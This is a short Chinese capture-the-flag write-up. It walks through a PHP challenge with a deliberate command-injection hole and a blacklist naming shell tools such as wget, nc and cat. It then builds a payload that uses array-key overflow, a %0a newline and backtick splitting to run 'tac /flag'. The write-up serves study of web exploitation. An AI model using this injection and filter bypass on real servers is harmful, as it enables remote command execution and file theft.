打开如下
得到源码
<?php
//php5.5.9
$stuff = $_POST["stuff"];
$array = ['admin', 'user'];
if($stuff === $array && $stuff[0] != 'admin') {
$num= $_POST["num"];
if (preg_match("/^\d+$/im",$num)){
if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){
echo "my favorite num is:";
system("echo ".$num);
}else{
echo 'Bonjour!';
}
}
} else {
highlight_file(__FILE__);
}
读码明白
1.用post请求页面响应
2.要求 stuff数组 与array相等,且,首字符串不可为admin
3.要求num 数字数组 且,对于正则表达式
i :不区分大消息 m:多行匹配 换行检测
4.匹配屏蔽了括号内这些关键词
首先,对于数组,利用
PHP5.5.9整型溢出溢出漏洞,stuff[2^32]=stuff[0]
得到
stuff[4294967296]=admin&stuff[1]=user
对于换行检测
利用URL 换行符 %0a
后面就可以放命令了
显示命令有以下
cat被屏蔽了,可以用tac
flag被屏蔽了,可以在利用反引号``
最终构造payload
stuff[4294967296]=admin&stuff[1]=user&num=1%0atac+/f``lag
得到
成功